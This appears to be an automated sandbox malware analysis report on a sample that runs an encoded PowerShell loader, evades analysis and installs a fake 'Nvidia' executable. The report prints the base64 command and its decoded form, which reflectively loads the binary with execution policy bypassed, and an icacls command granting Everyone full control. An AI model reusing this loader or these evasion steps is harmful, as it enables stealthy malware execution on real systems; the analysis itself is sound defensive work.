Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Nvidia-48001\Nvidia-48001.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1A8AF05
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1AC4485
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1B7CAFB
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1B7A09C
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1375835
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1458CFE
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1AF370D
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 13ABC19
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1B3838A
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 139046F
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 144AA73
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1BA2DA9
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1BB0F09
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 141FF3B
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1B390F8
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1AC1D79
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1B8FAAB
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1B198F0
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1A7C117
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1AE0063
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 14399D7
Source: C:\Nvidia-48001\Nvidia-48001.exeAPI/Special instruction interceptor: Address: 1B381E7
Source: C:\Users\user\Desktop\RcFBMph6zu.exeMemory allocated: C10000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeMemory allocated: 1A8A0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5130Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4717Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4176Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6564Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5224Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exe TID: 4184Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exe TID: 4932Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000006.00000002.3702905052.000001C4B6E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3705989946.000001C4BC457000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153321519.0000000001C93000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C60000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153636810.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.2834597976.0000000001C93000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153516790.0000000001C97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Nvidia-48001.exe, 0000000A.00000003.3153321519.0000000001C93000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.2834597976.0000000001C93000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153516790.0000000001C97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+v
Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: Base64 decoded $x='5fb68950-9abe-4a91-8df7-925c44183ee2';$y='C:\Users\engineer\Desktop\RcFBMph6zu.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: Base64 decoded $x='5fb68950-9abe-4a91-8df7-925c44183ee2';$y='C:\Users\engineer\Desktop\RcFBMph6zu.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }Jump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-48001 /grant Everyone:F /T /CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-48001\Nvidia-48001.exe /grant Everyone:F /T /CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-48001\Nvidia-48001.exe "C:\Nvidia-48001\Nvidia-48001.exe" Jump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand jab4ad0ajwa1agyayga2adgaoqa1adaalqa5ageaygblac0anabhadkamqatadgazabmadcalqa5adianqbjadqanaaxadgamwblaguamganadsajab5ad0ajwbdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabeaguacwbrahqabwbwafwaugbjaeyaqgbnahaaaaa2ahoadqauaguaeablaccaowb0ahiaeqagahsadqakacaaiabpagyaiaaoafsarqbuahyaaqbyag8abgbtaguabgb0af0aoga6afyazqbyahmaaqbvag4algbnageaagbvahiaiaatagcazqagadqakqanaaoaiaagahsaiaakag4adqbsagwaiaa9acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6afuabgbzageazgblaewabwbhagqargbyag8abqaoacqaeqapacaafqagaguababzaguaiab7acaajabuahuababsacaapqagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkaeyaaqbsaguakaakahkakqb9aa0acgagacaalgagacgawwbfadmamgauaf8aoaa4af0aoga6af8anwa0acgajab4ackakqanaaoaiaagaguaeabpahqaiaakaewaqqbtafqarqbyaekavabdae8arabfaa0acgb9acaadqakagmayqb0agmaaaagafsatgbvahqauwb1ahaacabvahiadablagqarqb4agmazqbwahqaaqbvag4axqanaaoaewanaaoaiaagafcacgbpahqazqataegabwbzahqaiaanaeeacabwagwaaqbjageadabpag8abgagagwabwbjageadabpag8abgagagkacwagahuabgb0ahiadqbzahqazqbkac4aiabdag8acab5acaazgbpagwazqagahqabwagageaiabsag8aywbhagwaiabkahiaaqb2agualaagageabgbkacaadabyahkaiabhagcayqbpag4alganacaalqbgag8acgblagcacgbvahuabgbkaemabwbsag8acgagafiazqbkaa0acgb9aa0acgbjageadabjaggaiab7aa0acgagacaavwbyagkadablac0asabvahmadaagacgaigbfahiacgbvahiaogagaciaiaaracaajabfac4arqb4agmazqbwahqaaqbvag4algbnaguacwbzageazwblackaiaataeyabwbyaguaiabsaguazaagaa0acgb9aa==
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand jab4ad0ajwa1agyayga2adgaoqa1adaalqa5ageaygblac0anabhadkamqatadgazabmadcalqa5adianqbjadqanaaxadgamwblaguamganadsajab5ad0ajwbdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabeaguacwbrahqabwbwafwaugbjaeyaqgbnahaaaaa2ahoadqauaguaeablaccaowb0ahiaeqagahsadqakacaaiabpagyaiaaoafsarqbuahyaaqbyag8abgbtaguabgb0af0aoga6afyazqbyahmaaqbvag4algbnageaagbvahiaiaatagcazqagadqakqanaaoaiaagahsaiaakag4adqbsagwaiaa9acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6afuabgbzageazgblaewabwbhagqargbyag8abqaoacqaeqapacaafqagaguababzaguaiab7acaajabuahuababsacaapqagafsaugblagyabablagmadabpag8abgauaeeacwbzaguabqbiagwaeqbdadoaogbmag8ayqbkaeyaaqbsaguakaakahkakqb9aa0acgagacaalgagacgawwbfadmamgauaf8aoaa4af0aoga6af8anwa0acgajab4ackakqanaaoaiaagaguaeabpahqaiaakaewaqqbtafqarqbyaekavabdae8arabfaa0acgb9acaadqakagmayqb0agmaaaagafsatgbvahqauwb1ahaacabvahiadablagqarqb4agmazqbwahqaaqbvag4axqanaaoaewanaaoaiaagafcacgbpahqazqataegabwbzahqaiaanaeeacabwagwaaqbjageadabpag8abgagagwabwbjageadabpag8abgagagkacwagahuabgb0ahiadqbzahqazqbkac4aiabdag8acab5acaazgbpagwazqagahqabwagageaiabsag8aywbhagwaiabkahiaaqb2agualaagageabgbkacaadabyahkaiabhagcayqbpag4alganacaalqbgag8acgblagcacgbvahuabgbkaemabwbsag8acgagafiazqbkaa0acgb9aa0acgbjageadabjaggaiab7aa0acgagacaavwbyagkadablac0asabvahmadaagacgaigbfahiacgbvahiaogagaciaiaaracaajabfac4arqb4agmazqbwahqaaqbvag4algbnaguacwbzageazwblackaiaataeyabwbyaguaiabsaguazaagaa0acgb9aa==Jump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeQueries volume information: C:\Users\user\Desktop\RcFBMph6zu.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\Desktop\RcFBMph6zu.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
